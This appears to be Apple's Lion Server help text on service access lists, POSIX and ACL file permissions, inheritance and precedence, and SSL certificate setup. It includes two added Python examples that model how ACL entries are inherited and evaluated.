Server Admin updates to reflect what operations are possible for a user's permissions. For example, some services are hidden or the Settings pane is dimmed when you can only monitor that service. Because the feature is enforced on the server side, the permissions also affect the serveradmin, dscl, dsimport, and pwpolicy command-line tools, because these tools are limited to the permissions configured for the administrator in use.

Service access

Service level security


You use a Service Access Control List (SACL) to enforce who can use a service. It is not a means of authentication. It is a list of those who have access rights to use a service. SACLs allow you to add a layer of access control on top of standard and ACL permissions. Only users and groups in an SACL can access its corresponding service. For example, to prevent users from accessing AFP share points on a server, including home folders, remove the users from the AFP service's SACL. Server Admin in Lion Server allows you to configure SACLs. Open Directory authenticates user accounts and SACLs authorize use of services. If Open Directory authenticates you, the SACL for login window determines whether you can log in, the SACL for AFP service determines whether you can connect for Apple file service, and so on.

Control access to services


You can use Server Admin to configure which users and groups can use services hosted by a server. You set up access to services for users and groups using SACLs. You can set up the same access to all services, or you can select a service and customize its access settings. Access controls are simple. Choose between allowing all users and groups to use services or allowing selected users and groups to use services. You can separately specify access controls for individual services, or you can define one set of controls that applies to the services hosted by the server.

You can also control user access to several services using the Server app. For example, only the Server app can control user access to Podcast and Time Machine services. For information, see Control a user's access to services.

1. Select a server in the Servers list.
2. Click Settings, then click Access.
3. Click Services.
4. Choose a service and then choose whether to allow everyone access to it or whether to allow specified users to access the service.
5. If you have chosen to specify users, add the users and groups as needed.

RELATED INFORMATION

Server settings reference

Control a user's access to services


Use the Server app to control users' access to services. You can restrict users' access to services listed in the Server app except Web and Wiki services. Web and Wiki services have more customizable access control. For websites, you can limit access on a per-site level. For example, if your server is hosting two websites, www.example1.com and www.example2.com, you can give users access to www.example1.com but not to www.example2.com. Wikis have their own access controls, so you can restrict who's allowed to create wikis. When you create a wiki, you can designate others as administrators. Wiki administrators can choose who has access to the wiki and whether they can read and write or just read wiki content.

1. In the Server app, click Users.
2. Control-click the user and choose Edit Access to Services.
3. In the dialog that appears, select the checkboxes for services you want the user to access, then click OK.

RELATED TOPICS

Publish a website
Choose group services

File permissions

About permissions

Permissions in the Mac OS X Lion environment


An important aspect of computer security involves granting and denying permissions. A permission is the ability to perform a specific operation, such as gaining access to data or executing code. Permissions are granted at the level of folders, files, or applications. Use the Server app to set up file service permissions. The term privileges refers to the combination of ownership and permissions, while the term permissions refers to the permission settings that each user category can have (Read & Write, Read Only, Write Only, and None).

If you're new to Mac OS X Lion and aren't familiar with UNIX-based systems, there are differences in the way ownership and permissions are handled compared to Windows. To increase security and reliability, Mac OS X Lion sets many system folders (for example, /Library/) to be owned by the root user (literally, a user named root). You can't change or delete these files and folders unless you're logged in as root. Be careful: there are few restrictions on what you can do when you log in as root, and changes to system data can cause problems. An alternative to logging in as root is to use the sudo command.

Note: The Finder calls the root user system.

By default, files and folders are owned by the user who creates them. After they're created, items keep their privileges (a combination of ownership and permissions) even when moved, unless the privileges are explicitly changed by their owner or an administrator. Therefore, new files and folders you create aren't accessible by users if they're created in a folder that users don't have privileges for. When setting up share points, make sure that items have the correct access privileges for the users you want to share them with.

Kinds of permissions
Mac OS X Lion supports two kinds of file and folder permissions:

Standard Portable Operating System Interface (POSIX) permissions
Access Control Lists (ACLs)

Standard POSIX permissions let you control access to files and folders based on three categories of users: Owner, Group, and Others. Although these permissions give you some control over who can access a file or a folder, they lack the flexibility and granularity that many organizations require in dealing with complex user environments. This is where ACLs come in handy. An ACL provides an extended set of permissions for a file or folder, and lets you set multiple users and groups as owners. ACLs are also compatible with Windows Server 2003, Windows XP, Windows Vista, and Windows 7, giving you added flexibility in a multiplatform environment.

Standard permissions
There are four types of standard POSIX access permissions that you can assign to a share point, folder, or file: Read & Write, Read Only, Write Only, and None. The following table shows how these permissions affect user access to shared items (files, folders, and share points).
Users can                                        Read & Write   Read Only   Write Only   None
Open a shared file                               Yes            Yes         No           No
Copy a shared file                               Yes            Yes         No           No
Edit a shared file                               Yes            No          No           No
Move items to a shared folder or share point     Yes            No          Yes          No
Move items from a shared folder or share point   Yes            No          No           No

Note: WebDAV has separate permissions settings.

Explicit permissions

Share points and the shared items they contain (including folders and files) have separate permissions. If you move an item to a different folder, it keeps its permissions and doesn't adopt the permissions of the folder where you moved it. In the following illustration, the second folder (Designs) and the third folder (Documents) were assigned permissions different from those of their parent folders:

The user categories Owner, Group, and Others

You can assign standard POSIX access permissions separately to three categories of users:

Owner: A user who creates an item (file or folder) on the file server is its owner and automatically has Read & Write permissions for that folder. By default, the owner of an item and the server administrator are the only users who can change its access privileges (but you can enable a group or others to use the item). The administrator can also transfer ownership of the shared item to another user. Note: When you copy an item to a drop box on a Mac file server, ownership of the item doesn't change. Only the owner of the drop box or root has access to its contents.

Group: You can put users who need the same access to files and folders in group accounts. Only one group can be assigned access permissions to a shared item. For more information about creating groups, search Help for Users & Groups.

Others: Others is any user (registered user or guest) who can log in to the file server.

Hierarchy of permissions

If a user is included in more than one category of users, each of which has different permissions, these rules apply:

Group permissions override Others permissions.
Owner permissions override Group permissions. For example, when a user is the owner of a shared item and a member of the group assigned to it, the user has the permissions assigned to the owner.
The more restrictive permissions always take precedence. For example, if a user belongs to a group that has No Access assigned to an item while the Others permissions are set to Read & Write access, the No Access privilege overrides the Others setting, denying the user access to the item.

Client users and permissions

Users of AppleShare Client software can set access privileges for files and folders they own. Users who use Windows file sharing services can also set access privileges.

Standard permission propagation

The Server app lets you specify which standard permissions to propagate. For example, you can propagate only the permission for Others to all descendants of a folder and leave the permissions for Owner and Group unchanged. For more information, see Propagate access permissions.

Access control lists (ACLs)


When standard POSIX permissions aren't enough, use access control lists (ACLs). An ACL is a list of access control entries (ACEs), each specifying the permissions to be granted or denied to a group or user and how these permissions are propagated throughout a folder hierarchy. ACLs in Mac OS X Lion let you set file and folder access permissions for multiple users and groups in addition to standard POSIX permissions. This makes it easy to set up collaborative environments with smooth file sharing and uninterrupted workflows, without compromising security. ACLs provide an extended set of permissions for a file or folder, to give you more granularity when assigning privileges than standard permissions would provide. For example, rather than giving a user full write permissions, you can restrict him or her to create only folders and not files. Only the Mac OS Extended volume format provides local file system support for ACLs. In addition, only the SMB and AFP protocols provide network file system support for ACLs in Windows and Apple networks, respectively. Apple's ACL model supports 13 permissions for controlling access to files and folders, as described in the following table.
Permission name                   Type            Description
Change Permissions                Administration  User can change standard permissions.
Take Ownership                    Administration  User can change the file's or folder's ownership to himself or herself.
Read Attributes                   Read            User can view the file's or folder's attributes (for example, name, date, and size).
Read Extended Attributes          Read            User can view the file's or folder's attributes added by third-party developers.
List Folder Contents (Read Data)  Read            User can list folder contents and read files.
Traverse Folder (Execute File)    Read            User can open subfolders and run a program.
Read Permissions                  Read            User can view the file's or folder's standard permissions using the Get Info or Terminal commands.
Write Attributes                  Write           User can change the file's or folder's standard attributes.
Write Extended Attributes         Write           User can change the file's or folder's other attributes.
Create Files (Write Data)         Write           User can create files and change files.
Create Folder (Append Data)       Write           User can create subfolders and add data to files.
Delete                            Write           User can delete the file or folder.
Delete Subfolders and Files       Write           User can delete subfolders and files.

In addition to these permissions, the Apple ACL model defines four types of inheritance that specify how these permissions are propagated:

Apply to this folder: Apply (Administration, Read, and Write) permissions to this folder.
Apply to child folders: Apply permissions to subfolders.
Apply to child files: Apply permissions to the files in this folder.
Apply to all descendants: Apply permissions to all descendants. To learn how this option works with the previous two, see Access control entries (ACEs).

The ACL use model

The ACL use model focuses on access control at the folder level, with most ACLs applied to files as the result of inheritance. Folder-level control determines which users have access to the contents of a folder. Inheritance determines how a defined set of permissions and rules pass from the container to the objects in it. Without this model, administration of access control would quickly become a nightmare, because you would need to create and manage ACLs on thousands or millions of files. Controlling access to files through inheritance also frees applications from maintaining extended attributes or explicit ACEs when saving a file, because the system applies inherited ACEs to files. For information about explicit ACEs, see Access control entries (ACEs).

ACLs and standard permissions

You can set ACL permissions for files and folders in addition to standard permissions. For more information about how Mac OS X Lion uses ACL and standard permissions to determine what users can and cannot do to a file or folder, see Access control entries (ACEs).

ACL management

In Mac OS X Lion, you create and manage ACLs in the Server app. The Get Info window in the Finder displays the logged-in user's effective permissions. For information about setting up and managing ACLs, see Set folder access permissions and Control access to a shared folder. In addition to using the Server app to set and view ACL permissions, you can also use the ls and chmod command-line tools. For information, see their man pages. You define ACLs for share points, files, and folders using the Server app.

Access control entries (ACEs)


An ACE is an entry in an ACL that specifies, for a group or a user, access permissions to a file or folder and the rules of inheritance.

What's stored in an ACE

An ACE contains the following fields:

User or Group. An ACE stores a universally unique ID for a group or user, which permits unambiguous resolution of identity.
Type. An ACE supports two permission types, Allow and Deny, which determine whether permissions are granted or denied. In the Server app, you can only set the Allow permission type. You can use the ls and chmod command-line tools to set the Deny permission type. For information, see their man pages.
Permission. This field stores the settings for the 13 permissions supported by the Apple ACL model.
Inherited. This field specifies whether the ACE is inherited from the parent folder.
Applies To. This field specifies what the ACE permission is for.

Explicit and inherited ACEs

The Server app supports two types of ACEs:

Explicit ACEs, which are those you create in an ACL. See Set folder access permissions.
Inherited ACEs, which are ACEs you created for a parent folder that were inherited by a descendant file or folder.

Note: Inherited ACEs cannot be edited unless you make them explicit.

Understanding inheritance

ACL inheritance lets you specify how permissions pass from a folder to its descendants.

The Apple ACL inheritance model

The Apple ACL inheritance model defines four options that you select or deselect in the Server app to control the application of ACEs (in other words, how to propagate permissions through a folder hierarchy):
Inheritance option         Description
Apply to this folder       Apply (Administration, Read, and Write) permissions to this folder.
Apply to child folders     Apply permissions to subfolders.
Apply to child files       Apply permissions to the files in this folder.
Apply to all descendants   Apply permissions to all descendants. Note: If you want an ACE to apply to all descendants without exception, you must select the Apply to child folders and Apply to child files options in addition to this option.

Mac OS X Lion propagates ACL permissions at two well-defined times:

At file or folder creation time: when you create a file or folder, the kernel determines what permissions the file or folder inherits from its parent folder.
When initiated by administrator tools: for example, when using the Propagate Permissions option in the Server app.

The following figure shows how the Server app propagates two ACEs (managers and design_team) after ACE creation. Bold text represents an explicit ACE and regular text represents an inherited ACE.

ACL inheritance combination

When you set inheritance options for an ACE in the Server app, you can choose from 12 unique inheritance combinations for propagating ACL permissions.

[Table: the 12 inheritance combinations, one row per combination, with columns Apply to this folder, Apply to child folders, Apply to child files, and Apply to all descendants; the check marks showing which options each combination selects are not recoverable from this copy.]

ACL permission propagation

The Server app lets you force the propagation of ACLs. Although this is done automatically by the Server app, there are cases when you might want to manually propagate permissions:

You can propagate permissions to handle exceptions. For example, you might want ACLs to apply to all descendants except for a subtree of your folder hierarchy. In this case, you define ACEs for the root folder and set them to propagate to descendants. Then, you select the root folder of the subtree and propagate permissions to remove the ACLs from descendants of that subtree. In the following example, the items in white had their ACLs removed by manually propagating ACLs.

You can propagate permissions in order to reapply inheritance in cases where you removed a folder's ACLs and decided to reapply them.
You can propagate permissions to clear all ACLs at once instead of going through a folder hierarchy and manually removing ACEs.

When you propagate permissions, the permissions of bundles and root-owned files and folders aren't changed. For more information about how to manually propagate permissions, see Propagate access permissions.

Rules of precedence

Mac OS X Lion uses the following rules to control access to files and folders:

Without ACEs, POSIX permissions apply. If a file or folder has no ACEs defined for it, Mac OS X Lion applies standard POSIX permissions.
With ACEs, order is important. If a file or folder has ACEs defined for it, Mac OS X Lion starts with the first ACE in the ACL and works its way down the list until the requested permission is satisfied or denied. You can change the ACE order from the command line using the chmod command.
Allow permissions are cumulative. When evaluating Allow permissions for a user in an ACL, Mac OS X Lion defines the user's permissions as the union of all permissions assigned to the user, including standard POSIX permissions.

After evaluating ACEs, Mac OS X Lion evaluates the standard POSIX permissions defined for the file or folder. Then, based on the evaluation of ACL and standard POSIX permissions, Mac OS X Lion determines the type of access a user has to a shared file or folder.
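The inheritance model and the rules of precedence described above, modelled in Python as an added example (this is not Apple's code and not how the kernel is implemented): inherit_aces computes what a new child receives from its parent at creation time, and check_access walks an ACL in order, stops at a Deny, accumulates Allows and falls back to the POSIX mode bits. The users and groups, the Shared/Grades/Archive tree and the mapping of POSIX bits onto the 13 ACL permissions are constructed assumptions.

```python
# Constructed model of the Lion ACL inheritance and precedence rules (not Apple code).
from dataclasses import dataclass, field
from typing import FrozenSet, List

# The 13 permissions of the Apple ACL model, grouped by type as in the page's table.
ADMIN_PERMS = frozenset({"change_permissions", "take_ownership"})
READ_PERMS = frozenset({"read_attributes", "read_extattributes", "list_folder",
                        "traverse_folder", "read_permissions"})
WRITE_PERMS = frozenset({"write_attributes", "write_extattributes", "create_files",
                         "create_folder", "delete", "delete_subfolders"})


@dataclass
class ACE:
    """One access control entry: principal, Allow/Deny, permissions, inheritance flags."""
    principal: str                      # user or group name (Lion stores a UUID here)
    kind: str                           # "allow" or "deny"
    perms: FrozenSet[str]
    apply_to_folder: bool = True        # "Apply to this folder"
    apply_to_child_folders: bool = False
    apply_to_child_files: bool = False
    apply_to_all_descendants: bool = False
    inherited: bool = False


@dataclass
class Node:
    name: str
    is_folder: bool
    owner: str
    group: str
    mode: int                           # POSIX mode bits, e.g. 0o750
    aces: List[ACE] = field(default_factory=list)   # ordered ACL


def inherit_aces(parent_aces, child_is_folder: bool) -> List[ACE]:
    """ACEs a new child receives at creation time. A child folder takes entries flagged
    "Apply to child folders", a child file those flagged "Apply to child files"; the copy
    keeps its inheritance flags only if the entry was also "Apply to all descendants"."""
    out = []
    for ace in parent_aces:
        wanted = ace.apply_to_child_folders if child_is_folder else ace.apply_to_child_files
        if not wanted:
            continue
        keep = child_is_folder and ace.apply_to_all_descendants
        out.append(ACE(ace.principal, ace.kind, ace.perms, apply_to_folder=True,
                       apply_to_child_folders=keep, apply_to_child_files=keep,
                       apply_to_all_descendants=keep, inherited=True))
    return out


def posix_perms(node: Node, user: str, groups) -> FrozenSet[str]:
    """Map POSIX mode bits onto ACL-model permissions (a simplification assumed by this
    example): Owner, then Group, then Others; r -> read perms, w -> write perms, x -> traverse."""
    if user == node.owner:
        bits, perms = (node.mode >> 6) & 7, set(ADMIN_PERMS)   # owner may chmod/chown
    elif node.group in set(groups):
        bits, perms = (node.mode >> 3) & 7, set()
    else:
        bits, perms = node.mode & 7, set()
    if bits & 4:
        perms |= READ_PERMS - {"traverse_folder"}
    if bits & 2:
        perms |= WRITE_PERMS
    if bits & 1:
        perms.add("traverse_folder")
    return frozenset(perms)


def check_access(node: Node, user: str, groups, requested) -> bool:
    """Rules of precedence: walk the ACL in order; the first ACE naming the user (or one of
    the user's groups) and a still-undecided permission decides it; a Deny stops evaluation,
    Allows accumulate, and anything no ACE decided falls back to the POSIX permissions."""
    groups = list(groups)
    principals = {user, *groups}
    undecided = set(requested)
    for ace in node.aces:
        if not undecided:
            break
        hit = undecided & ace.perms
        if ace.principal not in principals or not ace.apply_to_folder or not hit:
            continue
        if ace.kind == "deny":
            return False
        undecided -= hit
    return undecided <= posix_perms(node, user, groups)


def build_sample_tree():
    """Constructed hierarchy Shared/Grades/Archive/old.txt, after the page's teachers example."""
    teachers = ACE("teachers", "allow", READ_PERMS | WRITE_PERMS, apply_to_child_folders=True,
                   apply_to_child_files=True, apply_to_all_descendants=True)
    shared = Node("Shared", True, "admin", "staff", 0o750, [teachers])
    grades = Node("Grades", True, "admin", "staff", 0o750, inherit_aces(shared.aces, True))
    # Exception for one temporary teacher: deny reads on Grades and its direct children only
    # ("Apply to all descendants" left off). Listed first, so it is evaluated first.
    grades.aces.insert(0, ACE("anne", "deny", READ_PERMS,
                              apply_to_child_folders=True, apply_to_child_files=True))
    archive = Node("Archive", True, "admin", "staff", 0o750, inherit_aces(grades.aces, True))
    old = Node("old.txt", False, "admin", "staff", 0o640, inherit_aces(archive.aces, False))
    return shared, grades, archive, old
```

In the sample tree the Deny reaches Archive but not old.txt, which is the point of the note on "Apply to all descendants" above; a group member with no matching ACE for an administration right still falls through to the POSIX bits.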

Permissions in practice
Mac OS X Lion combines traditional POSIX permissions with ACLs. This combination provides great flexibility and fine granularity in controlling access to files and folders. However, if you're not careful in how you assign privileges, it may be hard for you to keep track of how permissions are assigned. With 17 permissions, you can choose from a staggering 98,304 combinations. Add to that a sophisticated folder hierarchy, many users and groups, and many exceptions, and you have a recipe for considerable confusion. The following are useful tips and advice to help you get the most out of access control in Mac OS X Lion.

Manage permissions at the group level

Assign permissions to groups first, and assign permissions to individual users only when there is an exception. For example, you can assign all teachers in a school district Read and Write permissions to a specific share point, but deny Anne Johnson, a temporary teacher, permission to read a specific folder in the share point's folder hierarchy. Using groups is the most efficient way of assigning permissions. After creating groups and assigning them permissions, you can add or remove users without reassigning permissions.

Gradually add permissions

Assign only necessary permissions and then add permissions only when needed. As long as you use Allow permissions, Mac OS X Lion combines the permissions. For example, you can assign the Students group partial reading permissions on an entire share point. Then, where needed in the folder hierarchy, you can give the group more read and write permissions.

Use the deny rule only when necessary

When Mac OS X Lion encounters a Deny permission, it stops evaluating other permissions the user might have for a file or folder and applies the Deny permission. Therefore, use Deny permissions only when absolutely necessary. Keep a record of these Deny permissions so you can delete them when they aren't needed.

Always propagate permissions

Inheritance is a powerful feature, so take advantage of it. By propagating permissions down a folder hierarchy, you save yourself the time and effort required to manually assign permissions to descendants.

Protect applications from being modified

If you share applications, make sure you set their permissions so that no one except a trusted few can change them. This is a vulnerability that attackers can exploit in order to introduce viruses or Trojan horses in your environment.

Keep it simple

You can complicate file access management unnecessarily, if you're not careful. Keep it simple. If standard POSIX permissions do the job, use those, but if you must use ACLs, avoid customizing permissions if you don't need to. Use simple folder hierarchies if feasible. A little strategic planning can help you create effective and manageable shared hierarchies.

Security considerations
The most effective method of securing your network is to assign correct privileges for each file, folder, and share point you create.

Restricting access to file services

You can use the Server app to restrict which users or groups have access to files, folders, and share points.

Restricting access to everyone

Be careful when creating and granting access to share points, especially if you're connected to the Internet. Granting access to Everyone could expose your data to anyone on the Internet.

Restricting guest access

When you configure any file service, you can turn on guest access. Guests are users who connect to the server anonymously without entering a user name or password. Users who connect anonymously are restricted to files and folders that have privileges set to Everyone. To protect your information from unauthorized access, and to prevent people from introducing software that might damage your information or equipment, take the following precautions by using File Sharing in the Server app. Depending on the controls you want to place on guest access to a share point, consider the following options:

Set privileges for Everyone to None for files and folders that guests shouldn't access. Items with this privilege setting can be accessed only by the item's owner or group.
Put all files available to guests in one folder or set of folders and then assign the Read Only privilege to the Everyone category for that folder and each file in it.
Assign Read & Write privileges to the Everyone category for a folder only if guests must be able to change or add items in the folder. Make sure you keep a backup copy of information in this folder.
Disable access to guests or anonymous users over AFP and SMB.
Share individual folders instead of entire volumes. The folders should contain only those items you want to share.

Manage permissions

Set folder access permissions


You can set file and folder access permissions with the Server app. Mac OS X Lion provides two ways to control access to files and folders: standard permissions and ACL permissions. Standard permissions provide basic control. ACL permissions provide more flexibility and control, but are more complex.

Set standard permissions

You can use the Server app to set standard permissions (Read & Write, Read Only, Write Only, or None) to control access to a folder and its contents. You can set different permissions for one user (the owner), one group, and all other users who log in. You can also set standard permissions on individual files. Standard permissions are also called POSIX permissions.

1. In the Server app sidebar, select the server and then click Storage.
2. Select the folder whose access permissions you want to change, and then choose Edit Permissions from the Action pop-up menu.
3. To grant access to a different user, double-click the current user name and enter a different user account name. As you type, the Server app looks up matching user accounts and displays them in a list. Clicking a listed user grants access permissions to that user.
4. To grant access to a different group, double-click the current group name and type the name of the new group. As you type, the Server app looks up matching group accounts and displays them in a list. Clicking a listed group grants access permissions to it.
5. To change the permission level for the user, group, or others, click the current setting in the Permission column and choose a setting from the pop-up menu. The permission level you set for Others applies to any user who logs in but isn't the specified user or a member of the specified group.

Set ACL permissions

You can use the Server app to set ACL permissions for a folder or a file. An ACL consists of Access Control Entries (ACEs), which you can add and change. Each entry applies to a specific user or group. For each entry, you can set 13 permissions, giving you much finer control over access than you have with standard permissions. For example, entries in an ACL can grant delete permission separately from write permission, so a user can edit a file but can't delete it. The first entry in the list takes precedence over the second, which takes precedence over the third, and so on. For example, if the first entry denies a user the right to edit a file, other entries that allow the same user editing permissions are ignored. The entries in the ACL also take precedence over standard permissions.

1. In the Server app sidebar, select the server and then click Storage.
2. Select the folder or file whose access permissions you want to change, then choose Edit Permissions from the Action pop-up menu.
3. To add an entry, click the Add button (+) and enter the name of the user or group you want to set specific access permissions for. As you type, the Server app looks up matching user and group accounts and displays them in a list. Clicking a user or group grants access permissions to the user or group.
4. To change the permission level for an entry, click the current setting in the Permission column and choose a setting from the pop-up menu.
Choice         Description
Full Control   Has full administration, read, write, and inheritance permissions.
Read & Write   Has full read, write, and inheritance permissions.
Read           Has full read and inheritance permissions.
Write          Has full write and inheritance permissions.
Custom         Doesn't have full administration, read, write, or inheritance permissions.

By default, each new entry has full read and inheritance permissions.

5. To change detailed permission settings for an entry, click the disclosure triangle next to the entry, optionally click the additional disclosure triangles that appear, and select or deselect permission settings. For information about the detailed permission settings, see Access control lists (ACLs) and Access control entries (ACEs).

RELATED TOPIC

Remove an ACL entry

Propagate access permissions


You can use the Server app to propagate a folder's permissions to all the folders and files it contains. You can specify which standard permissions to propagate: owner name, group name, owner permissions, group permissions, and permissions for others. You can propagate a folder's complete ACL, but you can't propagate individual entries that constitute the ACL.

1. In the Server app sidebar, select the server and then click Storage.
2. Select the folder whose access permissions you want to propagate, and then choose Propagate Permissions from the Action pop-up menu.
3. Select the permissions you want to propagate, and then click OK.

Important: Propagation begins as soon as you click OK, and you can't undo propagation. Before clicking OK, make sure you select the folder and permission settings you intend.

RELATED TOPICS

Remove a folder's inherited ACL entries
Remove an ACL entry

Remove an ACL entry


You can use the Server app to remove ACL permission entries you've added. Each entry defines a user's or group's access permission to a folder or file.

1. In the Server app sidebar, select the server and then click Storage.
2. Select the folder or file whose access permissions you want to change, and then choose Edit Permissions from the Action pop-up menu.
3. To remove an entry from the permission list, select the entry and click the Delete button (-).

RELATED TOPIC

Set folder access permissions

Sort an ACL canonically


When sorting an ACL canonically, the Server app first lists all entries that deny permission, then the entries that grant permission. ACL entries that deny permission have a permission type of Deny. Entries that grant permission have a permission type of Allow. All ACL entries created with the Server app are the Allow type. Permissions of the Deny type can exist on disks used with Mac OS X v10.6 or earlier. Permissions of the Deny type can be created on Lion Server disks by using the chmod command-line tool. For information about chmod, see its man page.

1. In the Server app sidebar, select the server, and then click Storage.
2. Select the folder or file whose ACL you want to sort, and then choose Edit Permissions from the Action pop-up menu.
3. Choose Sort Access Control List Canonically from the Action pop-up menu in the Edit Permissions dialog.

RELATED TOPIC

Set folder access permissions


Remove a folder's inherited ACL entries


If you don't want inherited ACL entries to apply to a folder or file, you can remove those entries using the Server app. Unlike explicit ACL entries, inherited ACL entries appear dimmed in the Server app's dialog for editing access permissions.

1. In the Server app sidebar, select the server and then click Storage.
2. Select the folder or file whose access permissions you want to change, and then choose Edit Permissions from the Action pop-up menu.
3. Choose Remove Inherited Entries from the Action pop-up menu in the Edit Permissions dialog.

RELATED TOPICS

Apply ACL inheritance to folders and files
Make inherited ACL entries explicit
Set folder access permissions


Make inherited ACL entries explicit


If you want to change inherited ACL entries for a folder or file, you must make the inherited entries explicit.

1. In the Server app sidebar, select the server and then click Storage.
2. Select the folder or file whose access permissions you want to change, and then choose Edit Permissions from the Action pop-up menu.
3. Choose Make Inherited Entries Explicit from the Action pop-up menu in the Edit Permissions dialog. You can now edit the ACL entries.

RELATED TOPICS

Remove a folder's inherited ACL entries
Set folder access permissions


Apply ACL inheritance to folders and files


If you removed all the ACL entries from a folder or file and want to restore inherited entries, you can use the Server app to propagate the parent folder's ACL. All descendants of the parent folder inherit the propagated ACL.

1. In the Server app sidebar, select the server and then click Storage.
2. Select the parent folder of the item whose ACL inheritance you want to restore, and then choose Propagate Permissions from the Action pop-up menu.
3. Select the Access Control List option, deselect all other options, and then click OK.

Important: Propagation begins as soon as you click OK, and you can't undo propagation. Before clicking OK, make sure you select the folder and permission settings you intend.

RELATED TOPIC

Remove a folder's inherited ACL entries


Common folder permissions


When sharing files and folders between computers, you can set custom permissions to grant or restrict access to those files and folders. Before you begin setting custom file and folder permissions, investigate how the file or folder is to be shared, who has access, and what type of access you want users to have. A recommended way to manage file and folder permissions is to create groups of users who share the same privileges. Depending on your network environment, you can use standard permissions (also referred to as POSIX permissions), ACLs, or both to manage file or folder access. The following table shows examples of the standard permissions and ACL permissions necessary to configure some common folder-sharing settings.
Drop box
  POSIX: Owner: read, write, execute; Group: read, write, execute; Other: write
  ACL (Everyone): Permission Type: Allow; select Traverse Folder, Create Files, Create Folder, and all inheritance options

Backup share
  POSIX: Set the owner to root and the group to admin. Owner: read, write, execute; Group: read, write, execute; Other: no permissions
  ACL: Permission Type: Allow; select List Folder Contents, Create Files, Create Folder

Home folder
  POSIX: Set the owner to root and the group to admin. Owner: read, write, execute; Group: read only; Other: read only
  ACL: Permission Type: Deny; select Delete, Apply to this folder, Apply to all descendants
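The canonical ordering described under Sort an ACL canonically, and the Deny Delete entry in the home folder row of the table above, both depend on ACL entries being evaluated in order. The following script is an added example, not code from Lion Server or from Apple's documentation: it parses the ACL lines that ls -le prints on Mac OS X, sorts them canonically, and shows which rights a user ends up with before and after the sort. The two listings it reads are constructed for the example; the first-match evaluation model and the explicit-before-inherited ordering are stated assumptions.

```python
"""Canonical ACL order and first-match evaluation over ls -le style listings.

Added example, not Apple's code.  Sorts the way the Server app's Sort Access
Control List Canonically command does (deny entries before allow entries) and
evaluates rights the way the kernel is assumed to: first matching entry wins.
"""
import re
from dataclasses import dataclass

# One ACE line as printed by `ls -le` on Mac OS X, for example
#  " 0: user:bob inherited allow list,search,readattr"
ACE_RE = re.compile(
    r"^\s*\d+:\s+(user|group):(\S+)\s+(inherited\s+)?(allow|deny)\s+(\S+)\s*$"
)


@dataclass(frozen=True)
class ACE:
    kind: str          # "user" or "group"
    name: str          # principal short name, or "everyone"
    inherited: bool    # True for the entries the Server app shows dimmed
    typ: str           # "allow" or "deny"
    rights: tuple      # ls -le right names: list, search, add_file, delete, ...

    def matches(self, user, groups):
        if self.kind == "user":
            return self.name == user
        return self.name == "everyone" or self.name in groups


def parse_acl(listing):
    """Return the ACEs in a listing, in the order they are evaluated."""
    aces = []
    for line in listing.splitlines():
        m = ACE_RE.match(line)
        if m:                                   # skips the ls -l header line
            kind, name, inh, typ, rights = m.groups()
            aces.append(ACE(kind, name, bool(inh), typ, tuple(rights.split(","))))
    return aces


def canonical_sort(aces):
    """Deny before allow (as the Server app sorts), and explicit entries before
    inherited ones (assumption: the canonical order chmod +a uses on Mac OS X)."""
    return sorted(aces, key=lambda a: (a.inherited, a.typ != "deny"))


def effective_rights(aces, user, groups=()):
    """Assumed ACL semantics: the first matching ACE decides each right.
    Rights no matching ACE mentions are left out and fall through to the
    POSIX mode bits."""
    decided = {}
    for ace in aces:
        if ace.matches(user, groups):
            for right in ace.rights:
                decided.setdefault(right, ace.typ)
    return decided


def format_acl(aces):
    """Render ACEs in ls -le style, renumbered."""
    return "\n".join(
        f" {i}: {a.kind}:{a.name} {'inherited ' if a.inherited else ''}{a.typ} "
        + ",".join(a.rights)
        for i, a in enumerate(aces)
    )


# Constructed listing: the home folder share from the table (root:admin, 755)
# on which a Deny Delete entry for bob sits below an Allow entry that already
# grants him delete (chmod +a# can insert at an index, and disks from Mac OS X
# v10.6 can carry such ACLs).
HOME_LISTING = """\
drwxr-xr-x+ 5 root  admin  170 Jan  1 09:00 Users
 0: user:bob allow list,search,readattr,delete,file_inherit,directory_inherit
 1: group:everyone allow readattr,readextattr
 2: user:bob deny delete,file_inherit,directory_inherit
"""

# Constructed listing: the drop box from the table (POSIX 0733; Everyone
# allowed Traverse Folder = search, Create Files = add_file, Create Folder =
# add_subdirectory, plus the inheritance flags).
DROPBOX_LISTING = """\
drwxrwx-w-+ 2 alice  staff  68 Jan  1 09:00 Drop Box
 0: group:everyone allow search,add_file,add_subdirectory,file_inherit,directory_inherit
"""

if __name__ == "__main__":
    home = parse_acl(HOME_LISTING)
    print("as listed, bob delete:", effective_rights(home, "bob").get("delete"))
    home = canonical_sort(home)
    print(format_acl(home))
    print("canonical, bob delete:", effective_rights(home, "bob").get("delete"))
    print("outsider on drop box:", effective_rights(parse_acl(DROPBOX_LISTING), "mallory"))
```

Run stand-alone, the script reports bob's delete right as allow for the listing as given and as deny once the list is in canonical order, which is exactly the difference the Server app's sort command makes visible; on the drop box, an outsider is allowed to add files and traverse but gets no decision on list, so the POSIX mode bits (no read for Other) apply.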

Lion Server user management

Security

SSL Certificates

Replace certificates
If you've assigned a certificate to a particular service, or to all services as a group, you can replace those certificates. You might replace the default self-signed certificate with one that's been signed by a third party, or you might need to replace an expired certificate. See Obtain a CA-signed certificate. If you receive a signed certificate from a third-party CA, it should have the extension .cer, .crt, or .p12. A .cer or .crt file contains only the certificate; it pairs with the private key already on the server, so it must be the certificate issued for the CSR you generated there. A .p12 file carries both the certificate and its private key and is protected by a passphrase.
RELATED INFORMATION

Obtain a CA-signed certificate


Create a self-signed certificate


If your server doesn't have an SSL certificate or if you need another one, start by creating a self-signed certificate.

1. Select the server under Hardware in the Server app sidebar.
2. Click Settings and then click the Edit button at the right of SSL Certificate.
3. From the Action pop-up menu, choose Manage Certificates.
4. Click the Add button (+) and choose Create Self-Signed Certificate from the pop-up menu.
5. In the Name field of the Certificate Assistant, enter your server's fully qualified host name (for example, server.example.com) and click Continue. Leave the other settings unchanged: Identity Type should be Self Signed Root, Certificate Type should be SSL Server, and Let me override defaults should be deselected.

You can choose the new self-signed certificate for the server. For information, see Use an SSL certificate. You can also use the new self-signed certificate to request a signed certificate from a certificate authority. For instructions, see Obtain a CA-signed certificate.


Import a certificate identity


If you have files containing an SSL certificate and the matching private key, you can import them and then use the certificate to secure services provided by your server. The SSL keys and certificates must be in Privacy Enhanced Mail (PEM) format. If your certificates and keys aren't in PEM format, you must convert them.

1. In the Finder, locate the files containing the certificate and matching private key, and put the files where you can see them while using the Server app (for example, on the desktop).
2. In the Server app, select your server's name under Hardware in the Server app sidebar.
